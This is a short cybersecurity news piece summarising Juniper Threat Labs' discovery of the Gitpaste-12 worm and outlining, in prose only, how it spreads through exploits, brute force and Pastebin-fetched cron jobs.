Cryptolaemus cybersecurity experts: The malware distribution process is the same used to distribute BazarLoader.
Juniper Threat Labs: Gitpaste-12 is a new worm which uses GitHub and Pastebin for housing component code and has at least 12 different attack modules available
Gitpaste-12 is a new malware which uses GitHub and Pastebin for housing component code and has at least 12 different attack modules available. It has been discovered by Juniper Threat Labs cybersecurity experts. There is evidence of test code for possible future modules, indicating ongoing development for the worm. For now, however, targets are Linux based x86 servers, as well as Linux ARM and MIPS based IoT devices. The first cybercrime GitPaste-12 first attacks were detected on October 15, 2020. Researchers reported both the Pastebin URL and the git repo in question and the git repo was closed on October 30, 2020. This should stop the proliferation of this botnet.
The cyber security experts: How the malware infection chain works
According the cybersecurity experts, the first phase of the attack is the initial system compromise. Gitpaste-12 will attempt to use known exploits to compromise systems and may also attempt to brute force passwords. Immediately after compromising a system, the malware sets up a cron job it downloads from Pastebin, which in turn calls the same script and executes it again each minute. This is presumably one mechanism by which updates to the cron jobs can be pushed to the botnet. The main shell script uploaded during the attack to the victim machine starts to download and execute other components of Gitpaste-12. First, it downloads and sets up cron job, which periodically downloads and executes script from Pastebin. Next, it downloads from GitHub and executes it.